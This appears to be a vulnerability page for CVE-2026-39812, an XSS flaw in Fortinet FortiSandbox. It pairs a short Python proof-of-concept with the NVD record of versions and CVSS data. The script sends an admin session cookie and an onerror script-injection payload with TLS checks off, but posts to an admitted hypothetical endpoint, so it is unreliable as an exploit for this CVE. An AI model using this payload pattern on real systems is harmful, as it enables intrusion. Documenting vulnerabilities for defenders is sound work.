CVE-2026-39812

import requests # PoC for CVE-2026-39812 # Vulnerability: Stored/Reflected XSS in Fortinet FortiSandbox # Description: This script attempts to inject a malicious payload. # Note: Requires authentication (PR:H) and a valid target endpoint. def exploit_xss(target_url, session_token): headers = { "Cookie": f"session={session_token}", "Content-Type": "application/x-www-form-urlencoded" } # Malicious payload to test script execution xss_payload = "<img src=x onerror=alert('CVE-2026-39812')>" # Hypothetical vulnerable endpoint (e.g., file submission or log entry) url = f"{target_url}/api/vuln_endpoint" data = { "description": xss_payload, "submit": "Submit" } try: response = requests.post(url, headers=headers, data=data, verify=False) if response.status_code == 200: print("[+] Payload sent successfully.") print("[*] Check if the alert triggers when an admin views the page.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage Example # exploit_xss("https://<target-ip>", "<admin_session_token>")

{"cve": {"id": "CVE-2026-39812", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:45.490", "lastModified": "2026-04-21T17:12:33.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox PaaS 5.0.0 through 5.0.5, FortiSandbox PaaS 4.4.0 through 4.4.8, FortiSandbox PaaS 4.2 all versions may allow attacker to execute unauthorized code or commands via <insert attack vector here>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.9", "matchCriteriaId": "0025C9C0-8D61-4563-96F9-F4E09DD83B26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.6", "matchCriteriaId": "3AAEF316-2134-4398-911C-E7532CD3AFF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "22.2.4134", "versionEndIncluding": "23.1.4260", "matchCriteriaId": "4ADBF898-6FFB-4DBF-AF54-67D431353496"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.3.4329", "versionEndIncluding": "24.1.4436", "matchCriteriaId": "C1D4D476-ECDB-453B-B69C-E9CD894B4FC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "E5E86B19-95E8-4107-85DC-EFE47225418C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "FDAB696D-20A1-4C1A-8DD6-FDECD560AC9C"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-110", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}